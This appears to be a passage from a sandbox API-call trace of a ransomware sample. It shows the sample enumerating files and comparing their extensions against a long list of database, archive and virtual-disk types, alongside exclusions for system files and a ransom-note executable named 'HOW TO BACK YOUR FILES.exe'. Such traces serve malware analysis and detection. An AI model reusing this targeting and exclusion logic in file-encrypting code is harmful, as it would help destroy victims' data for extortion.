(lpString="rar") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.825] lstrlenW (lpString="zip") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.825] lstrlenW (lpString="tgz") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.825] lstrlenW (lpString="vbox") returned 4 [0039.825] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.825] lstrlenW (lpString="vdi") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.825] lstrlenW (lpString="vhd") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.825] lstrlenW (lpString="vhdx") returned 4 [0039.825] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.825] lstrlenW (lpString="avhd") returned 4 [0039.825] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.825] lstrlenW (lpString="db") returned 2 [0039.825] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.825] lstrlenW (lpString="db2") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.825] lstrlenW (lpString="db3") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.825] lstrlenW (lpString="dbf") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.825] lstrlenW (lpString="mdf") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.825] lstrlenW (lpString="mdb") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.825] lstrlenW (lpString="sql") returned 3 [0039.825] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.825] lstrlenW (lpString="sqlite") returned 6 [0039.825] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.825] lstrlenW (lpString="sqlite3") returned 7 [0039.825] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.826] lstrlenW (lpString="sqlitedb") returned 8 [0039.826] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.826] lstrlenW (lpString="xml") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.826] lstrlenW (lpString="$er") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.826] lstrlenW (lpString="4dd") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.826] lstrlenW (lpString="4dl") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.826] lstrlenW (lpString="^^^") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.826] lstrlenW (lpString="abs") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.826] lstrlenW (lpString="abx") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.826] lstrlenW (lpString="accdb") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.826] lstrlenW (lpString="accdc") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.826] lstrlenW (lpString="accde") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.826] lstrlenW (lpString="accdr") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.826] lstrlenW (lpString="accdt") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.826] lstrlenW (lpString="accdw") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.826] lstrlenW (lpString="accft") returned 5 [0039.826] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.826] lstrlenW (lpString="adb") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.826] lstrlenW (lpString="adb") returned 3 [0039.826] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.827] lstrlenW (lpString="ade") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.827] lstrlenW (lpString="adf") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.827] lstrlenW (lpString="adn") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.827] lstrlenW (lpString="adp") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.827] lstrlenW (lpString="alf") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.827] lstrlenW (lpString="ask") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.827] lstrlenW (lpString="btr") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.827] lstrlenW (lpString="cat") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.827] lstrlenW (lpString="cdb") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.827] lstrlenW (lpString="ckp") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.827] lstrlenW (lpString="cma") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.827] lstrlenW (lpString="cpd") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.827] lstrlenW (lpString="dacpac") returned 6 [0039.827] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.827] lstrlenW (lpString="dad") returned 3 [0039.827] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.827] lstrlenW (lpString="dadiagrams") returned 10 [0039.827] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.827] lstrlenW (lpString="daschema") returned 8 [0039.827] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.827] lstrlenW (lpString="db-journal") returned 10 [0039.827] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.828] lstrlenW (lpString="db-shm") returned 6 [0039.828] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.828] lstrlenW (lpString="db-wal") returned 6 [0039.828] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.828] lstrlenW (lpString="dbc") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.828] lstrlenW (lpString="dbs") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.828] lstrlenW (lpString="dbt") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.828] lstrlenW (lpString="dbv") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.828] lstrlenW (lpString="dbx") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.828] lstrlenW (lpString="dcb") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.828] lstrlenW (lpString="dct") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.828] lstrlenW (lpString="dcx") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.828] lstrlenW (lpString="ddl") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.828] lstrlenW (lpString="dlis") returned 4 [0039.828] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.828] lstrlenW (lpString="dp1") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.828] lstrlenW (lpString="dqy") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.828] lstrlenW (lpString="dsk") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.828] lstrlenW (lpString="dsn") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.828] lstrlenW (lpString="dtsx") returned 4 [0039.828] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.828] lstrlenW (lpString="dxl") returned 3 [0039.828] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.829] lstrlenW (lpString="eco") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.829] lstrlenW (lpString="ecx") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.829] lstrlenW (lpString="edb") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.829] lstrlenW (lpString="epim") returned 4 [0039.829] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.829] lstrlenW (lpString="fcd") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.829] lstrlenW (lpString="fdb") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.829] lstrlenW (lpString="fic") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.829] lstrlenW (lpString="flexolibrary") returned 12 [0039.829] lstrlenW (lpString="fm5") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.829] lstrlenW (lpString="fmp") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.829] lstrlenW (lpString="fmp12") returned 5 [0039.829] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.829] lstrlenW (lpString="fmpsl") returned 5 [0039.829] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.829] lstrlenW (lpString="fol") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.829] lstrlenW (lpString="fp3") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.829] lstrlenW (lpString="fp4") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.829] lstrlenW (lpString="fp5") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.829] lstrlenW (lpString="fp7") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.829] lstrlenW (lpString="fpt") returned 3 [0039.829] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.830] lstrlenW (lpString="frm") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.830] lstrlenW (lpString="gdb") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.830] lstrlenW (lpString="gdb") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.830] lstrlenW (lpString="grdb") returned 4 [0039.830] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.830] lstrlenW (lpString="gwi") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.830] lstrlenW (lpString="hdb") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.830] lstrlenW (lpString="his") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.830] lstrlenW (lpString="ib") returned 2 [0039.830] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.830] lstrlenW (lpString="idb") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.830] lstrlenW (lpString="ihx") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.830] lstrlenW (lpString="itdb") returned 4 [0039.830] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.830] lstrlenW (lpString="itw") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.830] lstrlenW (lpString="jet") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.830] lstrlenW (lpString="jtx") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.830] lstrlenW (lpString="kdb") returned 3 [0039.830] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.830] lstrlenW (lpString="kexi") returned 4 [0039.830] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.830] lstrlenW (lpString="kexic") returned 5 [0039.830] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.831] lstrlenW (lpString="kexis") returned 5 [0039.831] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.831] lstrlenW (lpString="lgc") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.831] lstrlenW (lpString="lwx") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.831] lstrlenW (lpString="maf") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.831] lstrlenW (lpString="maq") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.831] lstrlenW (lpString="mar") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.831] lstrlenW (lpString="marshal") returned 7 [0039.831] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.831] lstrlenW (lpString="mas") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.831] lstrlenW (lpString="mav") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.831] lstrlenW (lpString="maw") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.831] lstrlenW (lpString="mdbhtml") returned 7 [0039.831] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.831] lstrlenW (lpString="mdn") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.831] lstrlenW (lpString="mdt") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.831] lstrlenW (lpString="mfd") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.831] lstrlenW (lpString="mpd") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.831] lstrlenW (lpString="mrg") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.831] lstrlenW (lpString="mud") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.831] lstrlenW (lpString="mwb") returned 3 [0039.831] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.832] lstrlenW (lpString="myd") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.832] lstrlenW (lpString="ndf") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.832] lstrlenW (lpString="nnt") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.832] lstrlenW (lpString="nrmlib") returned 6 [0039.832] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.832] lstrlenW (lpString="ns2") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.832] lstrlenW (lpString="ns3") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.832] lstrlenW (lpString="ns4") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.832] lstrlenW (lpString="nsf") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.832] lstrlenW (lpString="nv") returned 2 [0039.832] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.832] lstrlenW (lpString="nv2") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.832] lstrlenW (lpString="nwdb") returned 4 [0039.832] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.832] lstrlenW (lpString="nyf") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.832] lstrlenW (lpString="odb") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.832] lstrlenW (lpString="odb") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.832] lstrlenW (lpString="oqy") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.832] lstrlenW (lpString="ora") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.832] lstrlenW (lpString="orx") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.832] lstrlenW (lpString="owc") returned 3 [0039.832] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.833] lstrlenW (lpString="p96") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.833] lstrlenW (lpString="p97") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.833] lstrlenW (lpString="pan") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.833] lstrlenW (lpString="pdb") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.833] lstrlenW (lpString="pdm") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.833] lstrlenW (lpString="pnz") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.833] lstrlenW (lpString="qry") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.833] lstrlenW (lpString="qvd") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.833] lstrlenW (lpString="rbf") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.833] lstrlenW (lpString="rctd") returned 4 [0039.833] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.833] lstrlenW (lpString="rod") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.833] lstrlenW (lpString="rodx") returned 4 [0039.833] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.833] lstrlenW (lpString="rpd") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.833] lstrlenW (lpString="rsd") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.833] lstrlenW (lpString="sas7bdat") returned 8 [0039.833] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.833] lstrlenW (lpString="sbf") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.833] lstrlenW (lpString="scx") returned 3 [0039.833] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.833] lstrlenW (lpString="sdb") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.834] lstrlenW (lpString="sdc") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.834] lstrlenW (lpString="sdf") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.834] lstrlenW (lpString="sis") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.834] lstrlenW (lpString="spq") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.834] lstrlenW (lpString="te") returned 2 [0039.834] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.834] lstrlenW (lpString="teacher") returned 7 [0039.834] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.834] lstrlenW (lpString="tmd") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.834] lstrlenW (lpString="tps") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.834] lstrlenW (lpString="trc") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.834] lstrlenW (lpString="trc") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.834] lstrlenW (lpString="trm") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.834] lstrlenW (lpString="udb") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.834] lstrlenW (lpString="udl") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.834] lstrlenW (lpString="usr") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.834] lstrlenW (lpString="v12") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.834] lstrlenW (lpString="vis") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.834] lstrlenW (lpString="vpd") returned 3 [0039.834] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.834] lstrlenW (lpString="vvv") returned 3 [0039.835] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.835] lstrlenW (lpString="wdb") returned 3 [0039.835] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.835] lstrlenW (lpString="wmdb") returned 4 [0039.835] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.835] lstrlenW (lpString="wrk") returned 3 [0039.835] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.835] lstrlenW (lpString="xdb") returned 3 [0039.835] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.835] lstrlenW (lpString="xld") returned 3 [0039.835] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.835] lstrlenW (lpString="xmlff") returned 5 [0039.835] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.835] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49674100, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.835] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.835] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="aoldtz.exe") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="..") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="windows") returned -1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="bootmgr") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="temp") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="pagefile.sys") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="boot") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="ids.txt") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="ntuser.dat") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="perflogs") returned 1 [0039.835] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="MSBuild") returned 1 [0039.835] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv") returned 29 [0039.835] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 52 [0039.835] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="win7_scenic-demoshort_raw.wtv" | out: lpString1="win7_scenic-demoshort_raw.wtv") returned="win7_scenic-demoshort_raw.wtv" [0039.835] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv") returned 29 [0039.835] lstrlenW (lpString="Ares865") returned 7 [0039.836] lstrcmpiW (lpString1="raw.wtv", lpString2="Ares865") returned 1 [0039.836] lstrlenW (lpString=".dll") returned 4 [0039.836] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".dll") returned 1 [0039.836] lstrlenW (lpString=".lnk") returned 4 [0039.836] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".lnk") returned 1 [0039.836] lstrlenW (lpString=".ini") returned 4 [0039.836] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".ini") returned 1 [0039.836] lstrlenW (lpString=".sys") returned 4 [0039.836] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".sys") returned 1 [0039.836] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv") returned 29 [0039.836] lstrlenW (lpString="bak") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="bak") returned 1 [0039.836] lstrlenW (lpString="ba_") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="ba_") returned 1 [0039.836] lstrlenW (lpString="dbb") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="dbb") returned 1 [0039.836] lstrlenW (lpString="vmdk") returned 4 [0039.836] lstrcmpiW (lpString1=".wtv", lpString2="vmdk") returned -1 [0039.836] lstrlenW (lpString="rar") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="rar") returned 1 [0039.836] lstrlenW (lpString="zip") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="zip") returned -1 [0039.836] lstrlenW (lpString="tgz") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="tgz") returned 1 [0039.836] lstrlenW (lpString="vbox") returned 4 [0039.836] lstrcmpiW (lpString1=".wtv", lpString2="vbox") returned -1 [0039.836] lstrlenW (lpString="vdi") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="vdi") returned 1 [0039.836] lstrlenW (lpString="vhd") returned 3 [0039.836] lstrcmpiW (lpString1="wtv", lpString2="vhd") returned 1 [0039.836] lstrlenW (lpString="vhdx") returned 4 [0039.836] lstrcmpiW (lpString1=".wtv", lpString2="vhdx") returned -1 [0039.836] lstrlenW (lpString="avhd") returned 4 [0039.836] lstrcmpiW (lpString1=".wtv", lpString2="avhd") returned -1 [0039.836] lstrlenW (lpString="db") returned 2 [0039.837] lstrcmpiW (lpString1="tv", lpString2="db") returned 1 [0039.837] lstrlenW (lpString="db2") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="db2") returned 1 [0039.837] lstrlenW (lpString="db3") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="db3") returned 1 [0039.837] lstrlenW (lpString="dbf") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="dbf") returned 1 [0039.837] lstrlenW (lpString="mdf") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="mdf") returned 1 [0039.837] lstrlenW (lpString="mdb") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="mdb") returned 1 [0039.837] lstrlenW (lpString="sql") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="sql") returned 1 [0039.837] lstrlenW (lpString="sqlite") returned 6 [0039.837] lstrcmpiW (lpString1="aw.wtv", lpString2="sqlite") returned -1 [0039.837] lstrlenW (lpString="sqlite3") returned 7 [0039.837] lstrcmpiW (lpString1="raw.wtv", lpString2="sqlite3") returned -1 [0039.837] lstrlenW (lpString="sqlitedb") returned 8 [0039.837] lstrcmpiW (lpString1="_raw.wtv", lpString2="sqlitedb") returned -1 [0039.837] lstrlenW 